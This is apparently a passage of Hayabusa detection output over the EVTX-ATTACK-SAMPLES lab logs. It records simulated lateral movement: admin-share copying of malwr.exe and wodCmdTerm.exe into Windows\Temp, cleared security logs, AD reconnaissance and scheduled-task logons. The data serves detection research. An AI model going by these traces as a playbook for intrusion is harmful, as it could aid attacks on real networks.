Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.699 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.709 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:26.981 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:26.981 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.061 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.071 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.081 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:27.081 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:45.488 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:45.548 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:45.548 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:47.721 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:47.721 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:56.403 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:56.414 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:58.386 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.105 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.115 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.115 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:04.115 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.630 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:07.700 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.913 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.913 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.923 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:09.933 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.053 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:24:10.063 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 22:15:36.036 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: 
WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.583 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.614 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.614 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 22:15:49.692 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-18 23:23:37.147 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:43.570 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: 
| IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.491 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.507 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.522 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.522 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.538 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:52.538 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:57.397 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:23:57.397 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:07.601 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:07.601 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.413 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.413 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.741 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:11.741 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:15.647 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:15.662 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-18 23:24:15.662 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 00:02:00.383 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.179 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - 
Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.210 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.210 +00:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.210 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 
10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.226 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.257 +00:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.257 